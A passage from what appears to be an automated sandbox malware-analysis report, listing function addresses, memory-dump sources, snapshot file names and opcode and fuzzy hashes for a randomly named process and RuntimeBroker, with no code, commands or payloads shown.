                                                                      • Instruction ID: db2089bf6cea7e1a06ef7e179f895c5446392ea2fb49f52bd58def3912abaef7
                                                                      • Opcode Fuzzy Hash: c0186bf66b95d362cb25a69d1c9eaecfc839f880f9ecefc7387d894ca53d3705
                                                                      • Instruction Fuzzy Hash: ABE04F32B0DC0E47FB76AB51C8705BB3793EBD8315B160239C02BC25A1EE68A7028641
                                                                      Function 00007FFD9B8842E9 Relevance: .0, Instructions: 23COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000020.00000002.2905002208.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_32_2_7ffd9b880000_ROxqvkhuKqPawtyxZXXxveaCsizbJ.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6ffba7f9c8f24237c6078f110a6682df8d744e320990d81bed219b2998dc512f
                                                                      • Instruction ID: cf5d9456b0f8b087ce579222742c44d5c00a0eff383aba2b34a7135b95a6f5c3
                                                                      • Opcode Fuzzy Hash: 6ffba7f9c8f24237c6078f110a6682df8d744e320990d81bed219b2998dc512f
                                                                      • Instruction Fuzzy Hash: 0FF02B30918A1C8FCF98EB08C495EE9B7F1FB68305F154199914AE72A0CB31AA80CF85
                                                                      Function 00007FFD9B8BA050 Relevance: .0, Instructions: 22COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000020.00000002.2905002208.00007FFD9B8B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_32_2_7ffd9b8b1000_ROxqvkhuKqPawtyxZXXxveaCsizbJ.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                      • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                                      • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                      • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                                      Function 00007FFD9B8BA0E0 Relevance: .0, Instructions: 22COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000020.00000002.2905002208.00007FFD9B8B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_32_2_7ffd9b8b1000_ROxqvkhuKqPawtyxZXXxveaCsizbJ.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                      • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                                      • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                      • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                                      Function 00007FFD9B882AD5 Relevance: .0, Instructions: 22COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000020.00000002.2905002208.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_32_2_7ffd9b880000_ROxqvkhuKqPawtyxZXXxveaCsizbJ.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b4de9ccdc03301b4f8b34275fbf37b0f750ec48e4bf8e95f9c956194bf01efe9
                                                                      • Instruction ID: eb8d435e5286572925d122d2b9fd02f75a7c9531e29c9c9fdf170340d7b3d0e9
                                                                      • Opcode Fuzzy Hash: b4de9ccdc03301b4f8b34275fbf37b0f750ec48e4bf8e95f9c956194bf01efe9
                                                                      • Instruction Fuzzy Hash: 64E01270E0D91A47FBA4A794D8617F962A0DF5C300F1210B8D51ED33D1CD38AF418645
                                                                      Function 00007FFD9B8B7489 Relevance: .0, Instructions: 21COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000020.00000002.2905002208.00007FFD9B8B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_32_2_7ffd9b8b1000_ROxqvkhuKqPawtyxZXXxveaCsizbJ.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5261710265ed54c75a270379535fd34eb7994ce1e042bafcd929347f41f08012
                                                                      • Instruction ID: 038ce7341d9c1231b9a5bc7753a7dd2c7098abc472abf670ba3bd481a0413afa
                                                                      • Opcode Fuzzy Hash: 5261710265ed54c75a270379535fd34eb7994ce1e042bafcd929347f41f08012
                                                                      • Instruction Fuzzy Hash: C6E01A2594E7C04FC70B9B7488688507FA09E1721174A40EBC085CF1B3E5298949CB11
                                                                      Function 00007FFD9B8BD4D9 Relevance: .0, Instructions: 21COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000020.00000002.2905002208.00007FFD9B8B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_32_2_7ffd9b8b1000_ROxqvkhuKqPawtyxZXXxveaCsizbJ.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ed02685ae20b887f9d1b14b96f071fb218a9fca74753faadcff3a74b173d1d4d
                                                                      • Instruction ID: 8610c3d0c9b04dae6a64dd26f5afb267e6645950a4da6107bd0783e7cf4d1185
                                                                      • Opcode Fuzzy Hash: ed02685ae20b887f9d1b14b96f071fb218a9fca74753faadcff3a74b173d1d4d
                                                                      • Instruction Fuzzy Hash: 48E04F2194F7C04FC71B973488788507F60DE6721078A40EEC085CF5B3D5199849C702
                                                                      Function 00007FFD9B8B1C90 Relevance: .0, Instructions: 18COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000020.00000002.2905002208.00007FFD9B8B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_32_2_7ffd9b8b1000_ROxqvkhuKqPawtyxZXXxveaCsizbJ.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                      • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                                                      • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                      • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                                                      Function 00007FFD9B8BB388 Relevance: .0, Instructions: 17COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000020.00000002.2905002208.00007FFD9B8B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_32_2_7ffd9b8b1000_ROxqvkhuKqPawtyxZXXxveaCsizbJ.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: dad24a7085e4b25ae976ee30ed72e40c0fd5f4a8708794f52b09698d4d43b31b
                                                                      • Instruction ID: 1e45722583cf6f59798a1ebeba0d37c1815f9ef8acaa01b3bc1d4c35395ae455
                                                                      • Opcode Fuzzy Hash: dad24a7085e4b25ae976ee30ed72e40c0fd5f4a8708794f52b09698d4d43b31b
                                                                      • Instruction Fuzzy Hash: 68D02230B518040FC70CA738885883033A0EB6E20678100B8D00ACB2B1D92AEC88CB80
                                                                      Function 00007FFD9B8B6A90 Relevance: .0, Instructions: 17COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000020.00000002.2905002208.00007FFD9B8B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_32_2_7ffd9b8b1000_ROxqvkhuKqPawtyxZXXxveaCsizbJ.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1388b68208c2cafb3d95faa5872f9f62582b941bae5f6671caa91d2bd9987ffc
                                                                      • Instruction ID: a17d1d1b526b554f1f01fb16b81e804e53e8457bb8d4225cd09ae00d7c525fa3
                                                                      • Opcode Fuzzy Hash: 1388b68208c2cafb3d95faa5872f9f62582b941bae5f6671caa91d2bd9987ffc
                                                                      • Instruction Fuzzy Hash: C7D02234B549040FC70CA73888588303390EB6E2177C100A8D00AC72B1E92ADC88CB80
                                                                      Function 00007FFD9B8806A5 Relevance: .0, Instructions: 13COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000020.00000002.2905002208.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_32_2_7ffd9b880000_ROxqvkhuKqPawtyxZXXxveaCsizbJ.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4b40751a1cefa32304aed0fb67d836df1cb2b4d29e4b1e5402fa9057282fa0e8
                                                                      • Instruction ID: bb478eeaa9c7badbdeca6c84a0b576d85651ce9acd592571ea276c0665c7911e
                                                                      • Opcode Fuzzy Hash: 4b40751a1cefa32304aed0fb67d836df1cb2b4d29e4b1e5402fa9057282fa0e8
                                                                      • Instruction Fuzzy Hash: F7C04C05F6BE1F03F835B7EE98660ACA1405FDDA10FE70172D56D500F19C6E22D64196
                                                                      Function 00007FFD9B881310 Relevance: .0, Instructions: 12COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000020.00000002.2905002208.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_32_2_7ffd9b880000_ROxqvkhuKqPawtyxZXXxveaCsizbJ.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 668c455a36bf044a3fc1981b792573f4f4189be78a65a753a26ab6c65c12f0f8
                                                                      • Instruction ID: 6f20951d9237b8f00f29a896bec8088e29ba947ab2b423b5f39f2b5b06c8b41b
                                                                      • Opcode Fuzzy Hash: 668c455a36bf044a3fc1981b792573f4f4189be78a65a753a26ab6c65c12f0f8
                                                                      • Instruction Fuzzy Hash: E8C08C30511C0C8FC908FB28C88480433A0FF0D300BC20090E009C72B0E229DDC2C740
                                                                      Function 00007FFD9B89685C Relevance: .0, Instructions: 10COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000020.00000002.2905002208.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_32_2_7ffd9b890000_ROxqvkhuKqPawtyxZXXxveaCsizbJ.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4762f76aaffb547152c9fc367386d6c38ad1cfca32d814db8fa2d53e4a5583dc
                                                                      • Instruction ID: a93bc74dbc6caa178b94e3da12016f05f00c9abb67ad482c8bbe1fd791f62ea6
                                                                      • Opcode Fuzzy Hash: 4762f76aaffb547152c9fc367386d6c38ad1cfca32d814db8fa2d53e4a5583dc
                                                                      • Instruction Fuzzy Hash: 18D0C930D055298FEBA0DB548890BA876B1AF48300F5000F6800CE3295CA356D80DB50
                                                                      Function 00007FFD9B884E17 Relevance: .0, Instructions: 10COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000020.00000002.2905002208.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_32_2_7ffd9b880000_ROxqvkhuKqPawtyxZXXxveaCsizbJ.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 73f9df46521dc5d9b38235658b75fdd496f8a23a7d2725a714683a5f0d8331b5
                                                                      • Instruction ID: 159628d0f97664bdb91228d81ec8ec70b08acef9f2a7ece60a3a7ae8ab4a089f
                                                                      • Opcode Fuzzy Hash: 73f9df46521dc5d9b38235658b75fdd496f8a23a7d2725a714683a5f0d8331b5
                                                                      • Instruction Fuzzy Hash: 27C08CA1E2820986F324AAA048291AAB3828F08220F52867280ADA60A5DE3856025280
                                                                      Function 00007FFD9B882555 Relevance: .0, Instructions: 10COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000020.00000002.2905002208.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_32_2_7ffd9b880000_ROxqvkhuKqPawtyxZXXxveaCsizbJ.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 46032bed6468c8077b756c7bc0ac6740b1e5c1cd149772530fd01aac94e87016
                                                                      • Instruction ID: 11e8f6840c56b9950d008c9b54a51db137bbc57fa19dd7b59885ab10789689c0
                                                                      • Opcode Fuzzy Hash: 46032bed6468c8077b756c7bc0ac6740b1e5c1cd149772530fd01aac94e87016
                                                                      • Instruction Fuzzy Hash: 87C04C04F18C1E47F7597618443157E44929F48794F9544B8E41ED76CECD1C695206C7
                                                                      Function 00007FFD9B8806C8 Relevance: .0, Instructions: 8COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000020.00000002.2905002208.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_32_2_7ffd9b880000_ROxqvkhuKqPawtyxZXXxveaCsizbJ.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 709359157962c98cd0ecdf05242bc1fd9eaca1de47418e54626fafadeef44463
                                                                      • Instruction ID: ba6e37ca9a45537bbcdea9ebd158e69059ca973053a3aa372a6bcd614f8fb31a
                                                                      • Opcode Fuzzy Hash: 709359157962c98cd0ecdf05242bc1fd9eaca1de47418e54626fafadeef44463
                                                                      • Instruction Fuzzy Hash: ACB01200E67C0F02E42433FB0C520A470405F8C100FC30070D42D500A1985E12950282

                                                                      Non-executed Functions

                                                                      Function 00007FFD9B8809B0 Relevance: 5.2, Strings: 4, Instructions: 183COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000020.00000002.2905002208.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_32_2_7ffd9b880000_ROxqvkhuKqPawtyxZXXxveaCsizbJ.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: c9$!k9$"s9$#{9
                                                                      • API String ID: 0-1692736845
                                                                      • Opcode ID: bb6db4555ec8a96844f600108284c5dbe3dc6a4c4a6928bd76af170f331cd35b
                                                                      • Instruction ID: 3d574d97b2c9719f86ed7e5dbedaa552d132db20c9526dfaba96c0b5eb06fca4
                                                                      • Opcode Fuzzy Hash: bb6db4555ec8a96844f600108284c5dbe3dc6a4c4a6928bd76af170f331cd35b
                                                                      • Instruction Fuzzy Hash: 0C41D187F1853785E31E33FD792A9EC5B40CF8523DB0846B7E16E8A0D76C88648792E5

                                                                      Executed Functions

                                                                      Function 00007FFD9B8A09AC Relevance: 1.6, Instructions: 1644COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.2998629871.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffd9b8a0000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 987dd181a8cdd13f62457be19cdb954f8380f9cdaec9037fbcb6519f014bd7f0
                                                                      • Instruction ID: c33e3324ba6e9312e4ee29d1e8dea5f2dbc87588a311d0feaa8dcedb8bcf34e2
                                                                      • Opcode Fuzzy Hash: 987dd181a8cdd13f62457be19cdb954f8380f9cdaec9037fbcb6519f014bd7f0
                                                                      • Instruction Fuzzy Hash: FEC2B331B1995E4FEBA8FB5884A1AB47392FFA8350F1545B9D01DC32D6DE34BD828780
                                                                      Function 00007FFD9B8C1000 Relevance: .4, Instructions: 400COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.2998629871.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 22fc97bad1a21c30a7914685ff4878be168f83c63b7b659ab1c4a689ce1aae81
                                                                      • Instruction ID: 0ad6c52a3449cb40c40722200d391d7c9a9fb853e7515f6d1e4e99e3e30f433b
                                                                      • Opcode Fuzzy Hash: 22fc97bad1a21c30a7914685ff4878be168f83c63b7b659ab1c4a689ce1aae81
                                                                      • Instruction Fuzzy Hash: 6CB1CD61B2D69A0BE32DAB6C4CD20B473C1EB9A309B55877EC8DBC3457D92CE50782C1
                                                                      Function 00007FFD9B890B3F Relevance: 3.8, Strings: 3, Instructions: 55COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.2998629871.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffd9b890000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: c9$!k9$"s9
                                                                      • API String ID: 0-3426396564
                                                                      • Opcode ID: 95bd2d70263fadbb1f5d159e096fe91379546c1da031f0875cf2b402847db7e3
                                                                      • Instruction ID: 68ecfc92bb65c7e1269d229fedc20664105a2c118639b07c7c8855f942d9a511
                                                                      • Opcode Fuzzy Hash: 95bd2d70263fadbb1f5d159e096fe91379546c1da031f0875cf2b402847db7e3
                                                                      • Instruction Fuzzy Hash: C201442772EA6A8FC6016B7DFC506E8BB50EBC613679600FBC245CB5A2E110186FC7D0
                                                                      Function 00007FFD9B890940 Relevance: 1.5, Strings: 1, Instructions: 205COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.2998629871.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffd9b890000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: eM_H
                                                                      • API String ID: 0-282742407
                                                                      • Opcode ID: 0585f31eb6789805ea1c7d1d1b8958d2afadd670af6c8d94422691f6a08816cc
                                                                      • Instruction ID: 4044a6af31262e3d9192b15425db74bc1f92b3460048312bcd45c7658d89adb4
                                                                      • Opcode Fuzzy Hash: 0585f31eb6789805ea1c7d1d1b8958d2afadd670af6c8d94422691f6a08816cc
                                                                      • Instruction Fuzzy Hash: 8A51E531B1CB084FEB58DB1CA85667577D1EB99720F14417EF48DC32A2DA35BC428B82
                                                                      Function 00007FFD9B8BA59E Relevance: 1.3, Strings: 1, Instructions: 60COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.2998629871.00007FFD9B8B3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B3000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffd9b8b3000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: [
                                                                      • API String ID: 0-784033777
                                                                      • Opcode ID: 2e22b873c191d49c490a480e30419d343806f7026aeb5de892ad85ba87155204
                                                                      • Instruction ID: ebe96405d0b4b11926bf1887cdb92ebaf3cd62a93d0602a52305c7d25b0faa3b
                                                                      • Opcode Fuzzy Hash: 2e22b873c191d49c490a480e30419d343806f7026aeb5de892ad85ba87155204
                                                                      • Instruction Fuzzy Hash: 60116031A1CB688FDB64DF18C40526AB7E1FB98711F16053ED489E3261CB34B9018B83
                                                                      Function 00007FFD9B8C1B38 Relevance: 1.3, Strings: 1, Instructions: 59COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.2998629871.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: M
                                                                      • API String ID: 0-3664761504
                                                                      • Opcode ID: 93ccd9cb12d73481c63e1702b492b7e72fa19dd8c12df88e9a16b04a729d1080
                                                                      • Instruction ID: bb7650356f7d5c5e58d64ea971e03f87f52e82c674cdeed2858ed7e798d392a4
                                                                      • Opcode Fuzzy Hash: 93ccd9cb12d73481c63e1702b492b7e72fa19dd8c12df88e9a16b04a729d1080
                                                                      • Instruction Fuzzy Hash: 7D11BF6150F3C54FDB53A77488689A57FA0EF43611B0A81EFD0C5CF0B3DA69494ACB12
                                                                      Function 00007FFD9B8B57D9 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.2998629871.00007FFD9B8B3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B3000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffd9b8b3000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: M
                                                                      • API String ID: 0-3664761504
                                                                      • Opcode ID: 5cab46bbffd1190c9fbbd7b8ea6ad21cba0cd46f0e766dc4e7fe30dae0abbcc6
                                                                      • Instruction ID: fe2cbfad1581625b9cfff53e52da6bcbe9b6fed1f23e7998a17270866b1435f5
                                                                      • Opcode Fuzzy Hash: 5cab46bbffd1190c9fbbd7b8ea6ad21cba0cd46f0e766dc4e7fe30dae0abbcc6
                                                                      • Instruction Fuzzy Hash: 92E0923060A7C14FCB16AB748468455BFB0EF6720174A46EEC056CB1A3DB2DC886CB01
                                                                      Function 00007FFD9B8C1BE9 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.2998629871.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: M
                                                                      • API String ID: 0-3664761504
                                                                      • Opcode ID: 2c414676a96ac8991bef3f470e795f35547bdab4ee671542b895c327aebbf579
                                                                      • Instruction ID: 825d34e207d7b75df8fe4d01d6d004ee6a95eeaccaf4bf0af877a17fb57c0459
                                                                      • Opcode Fuzzy Hash: 2c414676a96ac8991bef3f470e795f35547bdab4ee671542b895c327aebbf579
                                                                      • Instruction Fuzzy Hash: 2FE06D2164E3C04FCB16EB3888688557FA0AE6720174A42EEC086CF1A3EA2D8889C711
                                                                      Function 00007FFD9B8CA039 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.2998629871.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: M
                                                                      • API String ID: 0-3664761504
                                                                      • Opcode ID: 9a3845fec4913bcfa2a1c2dcf1e30361f1467e650845f2075d1ebae0f6f34127
                                                                      • Instruction ID: d4c85a19c988f8ae481850d15cdfad4b3ea28baac6b7a44035ae6bb4b3e4069a
                                                                      • Opcode Fuzzy Hash: 9a3845fec4913bcfa2a1c2dcf1e30361f1467e650845f2075d1ebae0f6f34127
                                                                      • Instruction Fuzzy Hash: 86E06D6164E7C44FCB5AEB748869454BFA0EF6721174A42EFC045CF1A7EA2DC885C701
                                                                      Function 00007FFD9B8C2E49 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.2998629871.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: M
                                                                      • API String ID: 0-3664761504
                                                                      • Opcode ID: 3e9fc67d7ac4348ac486666174a32f760403b8fba770065871490caea315ebb7
                                                                      • Instruction ID: b4a49f4f1ef1186964d0937bb0e67b9b0c1f0695dcb6b0cfbb6661a39f40ff14
                                                                      • Opcode Fuzzy Hash: 3e9fc67d7ac4348ac486666174a32f760403b8fba770065871490caea315ebb7
                                                                      • Instruction Fuzzy Hash: 04E06D6164E7C44FC71AEA788869854BFA0EF6721174A52EFC045CF1A7EA2D8889C701
                                                                      Function 00007FFD9B8A3B19 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.2998629871.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffd9b8a0000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: M
                                                                      • API String ID: 0-3664761504
                                                                      • Opcode ID: 3714299f4265d16e45ac9a12386e70e97423550eb86f5f067117f3852a49c3b3
                                                                      • Instruction ID: 135b3fa46d31af2e61232207c28bccebfda58029da2436e9f3cb6aeb8a92358b
                                                                      • Opcode Fuzzy Hash: 3714299f4265d16e45ac9a12386e70e97423550eb86f5f067117f3852a49c3b3
                                                                      • Instruction Fuzzy Hash: 7CE0657160F7C44FC716A67488684547FA1EF6720174A41EFC086CF1A3DA1D8845C701
                                                                      Function 00007FFD9B8B9359 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.2998629871.00007FFD9B8B3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B3000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffd9b8b3000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: I
                                                                      • API String ID: 0-3707901625
                                                                      • Opcode ID: 2db8c9ac7efa9cdc91341b19b6f968f1edf1b99bd8b104cb944dddec58a07669
                                                                      • Instruction ID: fcaf63145801c42f6afee87650239952ccfd267057284dfa9507a20e85fb12cd
                                                                      • Opcode Fuzzy Hash: 2db8c9ac7efa9cdc91341b19b6f968f1edf1b99bd8b104cb944dddec58a07669
